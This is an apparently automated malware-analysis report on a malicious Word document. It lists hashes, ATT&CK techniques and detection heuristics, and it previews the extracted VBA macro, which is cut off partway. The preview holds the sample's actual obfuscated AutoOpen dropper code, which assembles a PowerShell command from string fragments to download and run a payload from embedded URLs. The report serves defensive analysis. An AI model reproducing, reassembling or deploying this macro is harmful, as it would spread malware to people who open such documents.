Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 44dab3cab64eb608…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 206.0 KB
Created: 2017-12-11 08:32:00
Authoring application: Microsoft Office Word
First seen: 2019-01-25
MD5: d95692ae35921f0ab040b37a54939583
SHA-1: d825451eb0417a1242906c3281e38c5727c5d550
SHA-256: 44dab3cab64eb60807fb2a88f0954cbd58d6bf389d910f547f3bcb58170ebe8f
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro with an AutoOpen function, a common technique for running code automatically when the document is opened. The macro uses a Shell() call, which indicates an attempt to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports this assessment.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium; 2 related findings; OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical; OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high; OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • OLE document has large unaccounted-for region [high; OLE_SLACK_ANOMALY]
    OLE file is 210,944 bytes but its declared streams total only 24,665 bytes; 186,279 bytes (88%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 82198 bytes
SHA-256: 3d003ecf2f69647dbaafba1ae334ce625a63fdd3ac2bd4eee19e59349587c80e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GJwOFcGfqaH"
Function YQErrojjzZT()
zIMPzdYpw = UCase("PJTYRLdn" + "YcXiOMZHiEDV" + "EEqXzNm" + "BsJAsRftvkc" + "fBkhIVRmIljImO") + UCase("PhuMQAJ" + "kOdWvuOnUa" + "VCTJPdvzUQ" + "AOdMQLBX" + "wWiASiwW")
qOPpHaz = Mid("ihtrc9SlACE(rpa4l7rpa,[StRiwJi+wJinG][cHAr]92).rE'+'PlACE(rpa38QLbN", 8, 55)
uOCqBj = UCase("tCaGwHwn" + "lSUuwAaHwwm" + "JNkiYLiThL" + "CJJlqliP" + "mqlpJkhkNpYqOk") + UCase("pqbawUTwaGSl" + "PkVPinlScuVni" + "FrnWnYZvzJITiS" + "KjrzsVdUIHawRN" + "GnSaNEnkiMPTkL")
HBnhjzpc = UCase("tzMhRtBvYiiUA" + "HYNPsiiCmwOWw" + "TqliZHaSzT" + "kLUmWpqwhWcFOG" + "OrLQSuuccisDv") + UCase("OoYtSHXJQPGYYR" + "qlWYmsj" + "jACqisEd" + "vESiDLwwQFaw" + "uWcalzVf")
XvANrVWsz = UCase("jAURNqYuoZ" + "wOzUjTNLpQM" + "UJoGdnHXjqKN" + "pOLmOYzAmGw" + "stDPnRDUQzHZj") + UCase("GhBwGElqtEBZar" + "jiDpNluE" + "tYGtNqGm" + "USRwqzu" + "CAwNOrMH")
CGZtmSRBvrW = Mid("CCwFwlaa0padrpa+rpaom;3rpa+rlUH21J7wdiJr4kEUG4A0RiKPjEWr", 10, 19)
EbswmvlEGua = UCase("AfhptPRo" + "LlVcTwTnZ" + "ZVnIKaGfNHH" + "HGmDnAOS" + "hboOKnSDiHwX") + UCase("FnMWWOmjDhJEdO" + "PLSYHtsuztAmo" + "jAJkMBzrQdz" + "ziuiKjZcnTo" + "PCMsNcWcwH")
ASsaREQ = UCase("RDjWJMdtChzs" + "CzPWGZvlrDu" + "iuFuiht" + "jZDCjKGoEnSw" + "azAwrknMv") + UCase("zpPbSXzXAE" + "wduMpvS" + "hDlzrIwE" + "nwGalzDNQjoQFP" + "sIiTGlBpU")
mdpHzOvQC = UCase("RDDIJrdSl" + "PclimfzYM" + "vRmYSDKR" + "VtpoAQPbfCTSPs" + "zwEvwwE") + UCase("IfWzRfpG" + "MVPXZolOXDU" + "ttfZiaUwOT" + "QihJiQzwpwnGuc" + "XKThavknOlq")
NbJVisnz = Mid("JrUNOBY9Carpa+rpabcrpa+rpa in 3mybKSivKMorl773Ll", 10, 25)
amMzJ = UCase("OWOrYSV" + "CkDwfKirw" + "LiqcnTFiid" + "KlHlVWcoWsQSzC" + "OudTpOncdpO") + UCase("jvlposUszvMK" + "BCcjuMtZIELFK" + "kXIivGkttkCba" + "KfShSfnLKwi" + "UMaqakiEjUr")
uwFhcUzOmM = UCase("iEVHRsVzps" + "GzZGiaGnlzC" + "JfjsEfu" + "XnrPsUpVO" + "cqifMkBoGN") + UCase("wFcfALbk" + "RTuaGTGJOKlkZM" + "MZiSwrPZhJ" + "iPkrINkOHJ" + "EYtirawbXZsHTb")
jOwUlFtfzHc = UCase("NDJzVkUL" + "BWZOSqYahHQu" + "YuwZzcDHvGYBD" + "YoMQtaPKrjl" + "jbSSTsR") + UCase("fPAwmrHfFP" + "MPPzmUq" + "TdOCNnusco" + "njjiwJnQdBS" + "EciZoUbjzdVw")
ZKFoNHOwu = Mid("rPcESQ2tm+[CHAR]116),[CHAR]36  -rEPlACe'wJi',[CHAR]39-rEPlACe ([CHzl", 10, 57)
HMooWi = UCase("IoHBtNQjkrZW" + "YAKFLPU" + "ZSApdFl" + "pHRQbEw" + "FPinsInR") + UCase("vDXOnwD" + "bjVHMQIi" + "vjIGZTDDAvh" + "NQfiliBOmCLN" + "AVaztzaI")
FJIQvkjCd = UCase("QMnIszfqcbVcj" + "qwEMVAtKa" + "OGYBIjKKlrf" + "AHlCnsbANwHBlh" + "QzwzGlIumaiiw") + UCase("KrpmswwaS" + "AiZRRwWPb" + "tLntZLrNzcIKf" + "DFROsivqhkzX" + "qdnDOHIW")
qUhziXMV = UCase("Evqfzlijf" + "cDhfJqHz" + "iaMqOjvSpQA" + "wjFOKlXqTP" + "TJObnjp") + UCase("NUJMsrFbzCTp" + "iqfUcQzFk" + "ISXtjzEH" + "zjnAmWNXFJXn" + "amoSiHLPqbcLBt")
ijhlPjJAA = Mid("rJi+rp'+'a,rpa+rpahrpa+rpwJi+wJiattp:/rpa+rpa/karpetmurpa+rparrpa+rpaarpa+rpahrpa+rpa.nrpa+rpaet/hJ3ap/rpa+rpa,htrpa'+'+rpatp:rpa+rpa//piwJi+wJittmans.rpa'JS975pd2vj", 2, 154)
HFPfw = UCase("EwNjHjbqEqDpOM" + "HXsrDiCvCzAk" + "YtCWNEAV" + "LbMOqjG" + "WcQGwrORTU") + UCase("AKjGzPS" + "nhcJLLFL" + "fonWoidYT" + "bCoFujw" + "rfVMzXVTmu")
UYulHm = UCase("wYbuuhqjrp" + "zOtuvMVIskFOQw" + "VJIKplcsZhhctS" + "FwdpKwWvfPps" + "ksJKwwM") + UCase("YhAIUWUNNkcq" + "fIkbmAzN" + "uztaIjXXivG" + "hPdhpZB" + "RfNBuEkZjLzM")
THHLAzj = UCase("vWOpLEiK" + "WHLQjSPP" + "OAJBUAbtlqRAz" + "TFAMlfo" + "EmNznQWhu") + UCase("OLjjztBONRSrs" + "ZBrLfFdk" + "vvWoVML" + "EwYmlWkFGL" + "RWANuBZlYL")
ZRYiMw = Mid("s4GqbP2Ed4juaGFJK6sBPLplAcE  ([chAr]114+[chAr]112+[chAr]97),[chAr]39 '+' -rEplAcE  wJiVadwJi,[chAr]124) sKG. ( B8tshe'+'LLId[1]+B8tshElLID[13]+w'+'JiXwJi)') -rEPlACe  ([CHAR]66+[CHAR]560V1Z6r2GAUjFB", 23, 163)
acYUWAdkRQM = UCase("umAOtOoqq" + "hkEzsHu" + "azfLOlsjDvwnSz" + "kmccSvLNraajQ" + "HsRoOXOnjYOWM") + UCase("ssDmjrTL" + "ibBPknloF" + "qwDjwEZiwDE" + "viAUzX
... (truncated)